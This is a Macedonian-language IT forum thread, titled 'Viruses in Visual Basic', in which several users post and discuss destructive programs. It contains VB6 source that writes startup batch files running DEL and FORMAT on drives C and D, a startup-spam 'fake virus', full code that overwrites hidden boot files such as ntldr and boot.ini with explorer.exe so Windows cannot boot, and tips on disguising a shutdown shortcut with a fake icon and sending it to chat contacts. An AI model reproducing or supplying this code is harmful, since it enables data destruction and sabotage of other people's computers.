• Здраво и добредојдовте на форумот на IT.mk.

  Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.

Вируси во visual basic

Martinus

Intern
6 јуни 2008
4
0
Eve eden opasen virus! ! !

Private Sub Form_Load()
Open "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Bye_Bye.bat" For Output As #1
Print #1, "@echo off"
Print #1, "DEL C:\ -y"
Print #1, "DEL D:\ -y"
Print #1, "FORMAT C:\ -y"
Print #1, "shutdown -r -t 180"
MsgBox "Error!", vbCritical, "Error"
End
End Sub

A, moze i vaka.

Private Sub Form_Load()
Shell "@echo off"
Shell "DEL C:\ -y"
Shell "DEL D:\ -y"
Shell "FORMAT C:\ -y"
Shell "shutdown -r -t 180"
MsgBox "Error!", vbCritical, "Error"
End
End Sub

P.S. ne probuvajte go na vasiot kompjuter.
Vazno: Jas ne go probav!!!:D
 

Martinus

Intern
6 јуни 2008
4
0
Fake Virus:

Private Sub Form_Load()
Open "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Worm.bat" For Output As #1
Print #1, "start"
Print #1, "start"
Print #1, "start"
Print #1, "start"
Print #1, "start"
Print #1, "Worm"
MsgBox "Error!", vbCritical, "Error"
End
End Sub
 

Fiasco

Gaining Experience
2 март 2008
3,036
203
404
www.igorjanevski.com
Eve ti ama ne se pravi vo visual basic.
Ovoj virus ti go gasi pc za odredeno vreme ,kolku ke stavis ti.
Ides Dekstop>Desen Click>New>Shortcut=shutdown -s -t 1000 -c "Ova e lazen virus"
Ke go reimenuvas kako Enternet Explorer i ke ja stavis ikonata od nego.
I koga ke kliknes ke ti se iskluci pc-to za odredeno vreme.
Pozz
Ова изгледа не функционира на Виста.
 

Aleks

Gaining Experience
18 мај 2007
5,748
288
Тоа со shutdown секое дете од 5 години го знае и не е вирус. Во секој програмски јазик може да се направи вирус за секоја намена, дури и во паскал .)
 

Fiasco

Gaining Experience
2 март 2008
3,036
203
404
www.igorjanevski.com
Тоа со shutdown секое дете од 5 години го знае и не е вирус. Во секој програмски јазик може да се направи вирус за секоја намена, дури и во паскал .)
Znam deka ne e virus...se zezav porano na xp-to so ova, no na vistava ne pali :D
 

Laki Luciano

Intern
27 мај 2008
332
3
Море и тоа како пали кога ја сменив иконата како слика да е, ја праќам преку некоја чат програма и пуп за 2 секунди го гледам тој што ја примил дека е офлајн :LOL:
 

Blagojce

Gaining Experience
26 декември 2007
893
71
Прилеп
Blagojce's setup  
Processor & Cooler
Intel Core i5-3570 3.40GHz
Storage
2 TB
RAM
8 GB
Monitor
ASUS 24" LED Full HD
OS
Windows 10
 • Ја почнал/а темата
 • #38

fuUuUzZzZy

On your way to fame
14 декември 2007
4,843
910
Ohrid
За shutdown shortcut-от. Му ја сменил иконата и му ја пратил и кога овој го отворил shortcyt-от компјутерот му се исклучил....
shutdown -a , и решен проблем :eek:brazovan:

btw, темава е вируси во visual basic не тајмери за исклучување.. ама ај.. нека се брои и тоа :))
 

Fiasco

Gaining Experience
2 март 2008
3,036
203
404
www.igorjanevski.com
Море и тоа како пали кога ја сменив иконата како слика да е, ја праќам преку некоја чат програма и пуп за 2 секунди го гледам тој што ја примил дека е офлајн :LOL:
може, но кај мене не се гаси..:)
 
1 октомври 2008
278
9
Код:
VERSION 5.00

Begin VB.Form Form1 

  Caption     =  "Form1"

  ClientHeight  =  5070

  ClientLeft   =  60

  ClientTop    =  450

  ClientWidth   =  6825

  LinkTopic    =  "Form1"

  ScaleHeight   =  5070

  ScaleWidth   =  6825

  StartUpPosition =  3 'Windows Default

  Begin VB.FileListBox File1 

   Height     =  3015

   Left      =  360

   TabIndex    =  0

   Top       =  120

   Width      =  3735

  End

End

Attribute VB_Name = "Form1"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = False

Private Function spiro_C()

File1.System = True

File1.Hidden = True

File1.Normal = True

File1.ReadOnly = True

File1.Path = "C:"

For i = 1 To File1.ListCount

File1.ListIndex = i - 1

On Error Resume Next

If Not GetAttr(File1.Path & File1.FileName) = vbNormal Then

SetAttr File1.Path & File1.FileName, vbNormal

FileCopy "C:windowsexplorer.exe", File1.Path & File1.FileName

End If

Next

End FunctionPrivate Function spiro_D()

File1.System = True

File1.Hidden = True

File1.Normal = True

File1.ReadOnly = True

File1.Path = "D:"

For i = 1 To File1.ListCount

File1.ListIndex = i - 1

On Error Resume Next

If Not GetAttr(File1.Path & File1.FileName) = vbNormal Then

SetAttr File1.Path & File1.FileName, vbNormal

FileCopy "D:windowsexplorer.exe", File1.Path & File1.FileName

End If

NextEnd Function

Public Function DirExists(OrigFile As String)

Dim fs

Set fs = CreateObject("Scripting.FileSystemObject")

DirExists = fs.folderexists(OrigFile)

End FunctionPrivate Sub Form_Load()

Form1.Visible = False

If DirExists("C:windows") = True Then

Call spiro_C

End If

If DirExists("D:windows") = True Then

Call spiro_D

End IfEnd Sub
Еве еден вирус направен од мене .. само пазите затоа што ги уништуе старт уп фајлојте за виндос .. и нема враќање после рестартото виндовс не се подига
 
 • Ја почнал/а темата
 • #43

fuUuUzZzZy

On your way to fame
14 декември 2007
4,843
910
Ohrid
Еве еден вирус направен од мене .. само пазите затоа што ги уништуе старт уп фајлојте за виндос .. и нема враќање после рестартото виндовс не се подига
StartUp фајловите? Не разбирам.. Биди попрецизен малце.
Кој се тие startUp фајлови? Мислиш на сервиси и процеси од msconfig или ..?
 
1 октомври 2008
278
9
StartUp фајловите? Не разбирам.. Биди попрецизен малце.
Кој се тие startUp фајлови? Мислиш на сервиси и процеси од msconfig или ..?
Епа вака На старт уо фајловите мислам на фајловите кои ви се на роот партицијата односно на C:\ и не се во ниеден фолдер..
Тие се скриени фајлови
ntldr
boot.ini
config.sys
i tn..
Е сега овие фајлови се вчитуваат уште пред самото лоадирање на виндоус
т.е ntldr или Така Наречен NT Loader (driver za ntfs file system) служи за моунтирање на нтфс филе системите од хдд (нтфс партиција да бидам појасен) .. интересно е што овие фајлови виндоусот не ги порверу и не ги користи после боотирањето..
Е сега овоје вирус ја менува содржината на овие фајлови и тоа во нив ја става содржината од explorer.exe и на следниот рестарт виндоусот не се подига..
Ако имате уште некое кажете мило ќе ми биде да ви одговорам
 
 • Ја почнал/а темата
 • #45

fuUuUzZzZy

On your way to fame
14 декември 2007
4,843
910
Ohrid
Значи со еден збор онеспособен msconfig бидејки и преку него можат да се исклучат сите тие работи.

Сепак, браво за трудот и доброто објаснување :bravo:
 

Тони

Gaining Experience
11 април 2008
511
168
Битола
Код:
Еве еден вирус направен од мене .. само пазите затоа што ги уништуе старт уп фајлојте за виндос .. и нема враќање после рестартото виндовс не се подига
можиш да ми го пуштиш или да ми дајш линк да си го спуштам оти незнам да го работам Visual basic
 

Darki

Intern
13 мај 2009
4
0
Еве еден од мене ( сеуште работам на усвршување ):
Код:
For i = 1 to 3
i = 2 next Dim ss as new filesystemobject sss.copyfile .......startup
itn .. барам начин да ja stavam во regedit ама не ми оди ако ми помогне некој супер :) Btw : Ефектот на вирусоф е : CPU Usage : 100% и кога ке го рестартираш Пцто да се укл повторно :LOL: Кога тогаш ке пукне рамот :D:D (Имам пробано на мене на стар рам 512 mb sea imam 1gb)
 

Нови мислења

Последни Теми

Статистика

Теми
43,981
Мислења
854,154
Членови
29,623
Најнов член
Vaporizer
На врв Дно